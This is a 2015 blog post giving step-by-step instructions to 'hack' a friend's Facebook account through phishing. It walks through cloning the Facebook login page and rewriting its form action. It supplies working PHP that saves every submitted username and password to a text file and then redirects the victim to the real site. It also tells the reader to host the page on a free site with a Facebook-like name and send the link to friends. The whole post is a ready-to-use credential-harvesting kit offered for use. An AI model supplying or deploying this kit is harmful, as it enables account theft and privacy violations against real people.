July 07, 2015
There are few steps to hack your friend Facebook account Step 1 Create a fake facebook login page. Step 2 Copy the page source...
Home »
KNOW IT
» HOW TO HACK THE FACEBOOK -WITH IMAGES-STEP BY STEP - HACK THE FACEBOOK IN 6 MINUTES- BE A FACEBOOK HACKER
There are few steps to hack your friend Facebook account
Step 1
Create a fake facebook login page.
Step 2
Copy the page source in notepad. And find for action if you get or find for login_form which is preceded by action.
Step 3
Then change
action="https://m.facebook.com/r.php"
to action="post.php"
Step 4
Save this notepad file as index.html (take care of extension)
Step 5
Open new notepad file and paste the below code and save this file as post.php (take care of extension)
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 5
Now go to any free hosting sites like www.3owl.com. And Create a website with the name similar to Facebook.
Step 6
Click on "Switch" you will redirect to control panel and go to "file manager"
Step 7
Upload this two files(index.html and post.php) to file manager
Step 8
Double click on the index file, you will get the URL of your fake facebook page.
Step 9
Then send your fake facebook page URL to your friends and make them to login that page.
Step 10
You will get the email id and password of your friends in a new file named as username.txt created in free hosting website (www.yourfakefbpage3owl.com) file manager.
Double click on the username.txt file you will see the magic.
0 comments:
Post a Comment